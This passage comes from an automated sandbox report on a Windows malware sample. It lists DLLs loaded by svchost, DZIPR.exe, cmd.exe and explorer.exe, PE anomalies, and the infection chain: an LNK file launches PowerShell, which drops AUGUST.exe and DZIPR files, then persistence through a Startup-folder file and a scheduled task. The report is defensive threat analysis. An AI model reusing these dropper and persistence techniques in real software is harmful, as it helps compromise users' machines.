                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                      Source: uvnhjq.19.drLNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: BIT2369.tmp.21.drLNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,16_2_00406D5D
                      Source: gps.28.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: DZIPR.dll.17.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: DZIPR.dll.16.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: AUGUST.exe.11.drStatic PE information: real checksum: 0x33302 should be: 0x4a3c93
                      Source: demhwk.19.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: qapuwvr.24.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: DZIPR.exe.16.drStatic PE information: section name: .didata
                      Source: DZIPR.exe.17.drStatic PE information: section name: .didata
                      Source: demhwk.19.drStatic PE information: section name: cmxvoc
                      Source: qapuwvr.24.drStatic PE information: section name: cmxvoc
                      Source: gps.28.drStatic PE information: section name: cmxvoc
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00411C20 push eax; ret 16_2_00411C4E
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA55401 push ecx; ret 17_2_6FA55414
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA551A1 push ecx; ret 17_2_6FA551B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C525401 push ecx; ret 18_2_6C525414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C5251A1 push ecx; ret 18_2_6C5251B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD5401 push ecx; ret 23_2_6FAD5414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD51A1 push ecx; ret 23_2_6FAD51B4

                      Persistence and Installation Behavior

                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AUGUST.exe
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\qapuwvr
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dll
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\demhwk
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\gps
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exe
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe

                      Boot Survival

                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dll
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exe
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\lnfast_x64.job

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DEMHWK
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\QAPUWVR
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GPS
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4DE29 IsIconic,GetWindowPlacement,GetWindowRect,17_2_6FA4DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51DE29 IsIconic,GetWindowPlacement,GetWindowRect,18_2_6C51DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FACDE29 IsIconic,GetWindowPlacement,GetWindowRect,23_2_6FACDE29
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
